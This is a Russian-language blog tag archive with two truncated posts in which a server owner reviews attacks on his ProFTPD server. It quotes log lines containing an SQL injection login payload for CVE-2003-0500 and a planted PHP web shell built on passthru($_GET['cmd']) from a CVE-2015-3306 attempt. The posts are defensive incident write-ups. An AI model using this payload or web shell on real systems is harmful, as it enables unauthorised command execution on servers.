Архив метки: ProFTPD

Мелкие пакостники или как пытаются взломать мой FTP-сервер :-)

На своей VPS-ке я использую надежный и легко настраиваемый FTP-сервер ProFTPD

Этот же сервер использует, например, такой известный сайт как SourceForge.
Журнал этого сервера располагается в стандартном месте:
/var/log/proftpd/proftpd.log
Просмотр этого журнала очень увлекателен. Откуда только и какими только способами не щемятся любители подсмотреть чужие секреты или совершить какую-нибудь пакость:

некто из Ярославля пытается зайти под логином admin :
FTP session opened.
… (pppoe-94.136.198.158.ttel.ru[94.136.198.158]): USER admin: no such user found …
FTP session closed.
более изобретательный негодяй из Витебска пытается залогиниться как Alex :
FTP session opened.
… (mm-127-139-212-37.vitebsk.dynamic.pppoe.byfly.by[37.212.139.127]): USER Alex: no such user found …
FTP session closed.
а вот и знаток SQL (из самого Palo Alto, USA):

пытается эксплуатировать уязвимость 2003 года 🙂 CVE-2003-0500 «ProFTPd 1.2.9RC1 — ‘mod_sql’ SQL Injection»
FTP session opened.
… (15.211.195.254[15.211.195.254]): USER ‘)UNION SELECT’u’,’p’,1002,1002,’/tmp’,’/bin/bash’WHERE(»=’: no such user found …
FTP session closed.

Как же пресечь эти поползновения?
Читать далее

Попытка взлома моего сервера через уязвимость CVE: 2015-3306 в ProFTPD

В один прекрасный день я обнаружил в корневой директории одного из моих сайтов файл со странным именем d.php:
d.php

Помня, что такой файл я не создавал, я решил посмотреть его содержимое:
d.php
passthru($_GET['cmd']);echo 'm3rg3'; — очень занятно.
Код passthru($_GET['cmd']); позволяет выполнять команды с привилегиями сервера, cmd — имя переменной, в которой передается методом GET выполняемый код

213.92.207.124 — IP-адрес из диапазона польского провайдера Polprint.

Посмотрим в логи сервера ProFTPD, упомянутого в этом файле, и поищем что же там есть за этот айпишник 🙂 :

Читать далее